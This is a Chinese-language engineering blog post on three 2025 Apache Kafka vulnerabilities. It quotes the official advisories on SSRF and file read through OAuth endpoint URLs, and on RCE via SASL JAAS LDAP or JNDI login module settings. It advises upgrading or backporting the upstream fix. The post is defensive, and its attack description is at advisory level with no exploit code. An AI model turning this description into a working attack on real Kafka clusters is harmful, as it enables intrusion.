最近一周时间研发接连收到多个政务行业局点现场人员反馈,需要分析修复Kafka最近曝出的高危漏洞。笔者查阅Openwall和CVE,发现2025年06月09日确实有三个Kafka高危漏洞,详细列表如下:
CVE-2025-27817: Apache Kafka Client: Arbitrary file read and SSRF vulnerability (Luke Chen)
CVE-2025-27818: Apache Kafka: Possible RCE attack via SASL JAAS LdapLoginModule configuration (Luke Chen)
CVE-2025-27819: Apache Kafka: Possible RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration (Luke Chen)
版本范围:3.1.0-3.9.0
解决措施:见下文<<补丁修复章节>>
漏洞地址:https://www.cve.org/CVERecord?id=CVE-2025-27817
漏洞描述:
A possible arbitrary file read and SSRF vulnerability has been identified in Apache Kafka Client. Apache Kafka Clients accept configuration data for setting the SASL/OAUTHBEARER connection with the brokers, including "sasl.oauthbearer.token.endpoint.url" and "sasl.oauthbearer.jwks.endpoint.url". Apache Kafka allows clients to read an arbitrary file and return the content in the error log, or sending requests to an unintended location. In applications where Apache Kafka Clients configurations can be specified by an untrusted party, attackers may use the "sasl.oauthbearer.token.endpoint.url" and "sasl.oauthbearer.jwks.endpoint.url" configuratin to read arbitrary contents of the disk and environment variables or make requests to an unintended location. In particular, this flaw may be used in Apache Kafka Connect to escalate from REST API access to filesystem/environment/URL access, which may be undesirable in certain environments, including SaaS products. Since Apache Kafka 3.9.1/4.0.0, we have added a system property ("-Dorg.apache.kafka.sasl.oauthbearer.allowed.urls") to set the allowed urls in SASL JAAS configuration. In 3.9.1, it accepts all urls by default for backward compatibility. However in 4.0.0 and newer, the default value is empty list and users have to set the allowed urls explicitly.
CVE-2025-27818
版本范围:2.3.0-3.9.0
解决措施:见下文<<补丁修复章节>>
官网地址:https://www.cve.org/CVERecord?id=CVE-2025-27818
漏洞描述:
A possible security vulnerability has been identified in Apache Kafka. This requires access to a alterConfig to the cluster resource, or Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka clusters since Apache Kafka 2.0.0 (Kafka Connect 2.3.0). When configuring the broker via config file or AlterConfig command, or connector via the Kafka Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.LdapLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.
版本范围:2.0.0-3.3.2
解决措施:见下文<<补丁修复章节>>
官网地址:https://www.cve.org/CVERecord?id=CVE-2025-27819
漏洞描述:
In CVE-2023-25194, we announced the RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration in Kafka Connect API. But not only Kafka Connect API is vulnerable to this attack, the Apache Kafka brokers also have this vulnerability. To exploit this vulnerability, the attacker needs to be able to connect to the Kafka cluster and have the AlterConfigs permission on the cluster resource. Since Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage in SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka 3.4.0, and "com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule" is disabled by default in in Apache Kafka 3.9.1/4.0.0
仔细阅读上述漏洞描述的朋友会发现,其实三个漏洞说的是一回事,即安全认证jaas。所以解决措施都一样。如果现场允许的话,可以选择升级Kafka版本到3.9.1或者4.0.0,这两个版本已经修复。但是,通常现场是不允许随意升级的,尤其是Kafka版本跨度较大(ZooKeeper模式和KRaft模式),客户基本不批准。
笔记梳理2.0版本到4.0版本之间的差异,发现修复代码很独立,并不存在与别的模块耦合的情况。建议有需要修复的朋友可以自行修改自己对应Kafka版本的源码编译、更新kafka-clients-x.x.x.jar即可!其实就是增加个配置项禁止特定jaas内容访问Kafka而已,具体完整的源码修改地址见:
https://github.com/apache/kafka/commit/1ed61e4090353bc9e4802ee09366f512dc60884f